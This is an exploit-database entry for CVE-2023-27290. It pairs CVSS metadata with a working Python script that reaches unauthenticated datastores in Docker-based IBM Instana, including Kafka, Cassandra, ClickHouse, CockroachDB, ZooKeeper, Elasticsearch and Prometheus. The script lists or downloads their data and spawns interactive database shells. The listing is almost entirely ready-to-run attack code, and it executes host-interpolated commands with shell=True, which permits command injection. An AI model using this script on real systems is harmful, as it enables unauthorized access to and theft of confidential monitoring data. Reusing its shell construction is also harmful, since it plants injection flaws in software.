Docker based datastores for IBM Instana 241-2 243-0 - No Authentication Exploit

2023-04-0700:00:00

Shahid Parvez

0day.today

150

ibm instana

docker

datastores

no authentication

vulnerable version

exploit

command execution

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

EPSS

0.001

Percentile

41.6%

JSON

# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication 
# Google Dork: [if applicable]
# Date: 06 March 2023
# Exploit Author: Shahid Parvez (zippon)
# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability
# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana
# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)
# Tested on: [Mac os]
# CVE : CVE-2023-27290
import argparse
import subprocess
import pexpect

# Define the available options and their corresponding commands
COMMANDS = {
    "kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",
    "cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",
    "clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',
    "cockroach": "cockroach sql --host {host}:{port} --insecure",
    "zookeeper": "echo dump |ncat {host} {port}",
    "node-export": "curl http://{host}:{port}",
    "elasticsearch": "curl http://{host}:{port}/_cat/indices?v",
    "prometheus": "curl http://{host}:{port}/metrics",
    "clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'
}

# Define the parser for command-line arguments
parser = argparse.ArgumentParser(description="Script to run various commands on a host.")
parser.add_argument("host", help="The host IP address")
parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")
parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")
parser.add_argument("--output", help="Output the result to a file")
parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")

# Parse the command-line arguments
args = parser.parse_args()

# Determine the port number to use
if args.port is None:
    if args.option == "cassandra":
        port = "9042"
    elif args.option == "clickhouse":
        port = "8123"
    elif args.option == "cockroach":
        port = "26257"
    elif args.option == "elasticsearch":
        port = "9200"
    elif args.option == "kafka":
        port = "9092"
    elif args.option == "node-export":
        port = "8181"
    elif args.option == "prometheus":
        port = "9090"
    elif args.option == "zookeeper":
        port = "2181"
else:
    port = str(args.port)

# Build the command to execute
command = COMMANDS[args.option].format(host=args.host, port=port)

# Print the command line if verbose option is provided
if args.verbose:
    print(f"Executing command: {command}")

# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell
if args.option == "cassandra":
    child = pexpect.spawn(command)
    child.expect("Connected to.*", timeout=10)
    child.interact()
    output = child.before
elif args.option == "cockroach":
    child = pexpect.spawn(command)
    child.expect("root@.*:", timeout=10)
    child.interact()
    output = child.before
# If any other option is selected, execute the command and capture the output
else:
    output = subprocess.check_output(command, shell=True)

# If an output file is provided, write the output to the file
if args.output:
    with open(args.output, "wb") as f:
        f.write(output)

# Print the output to the console
print(output.decode())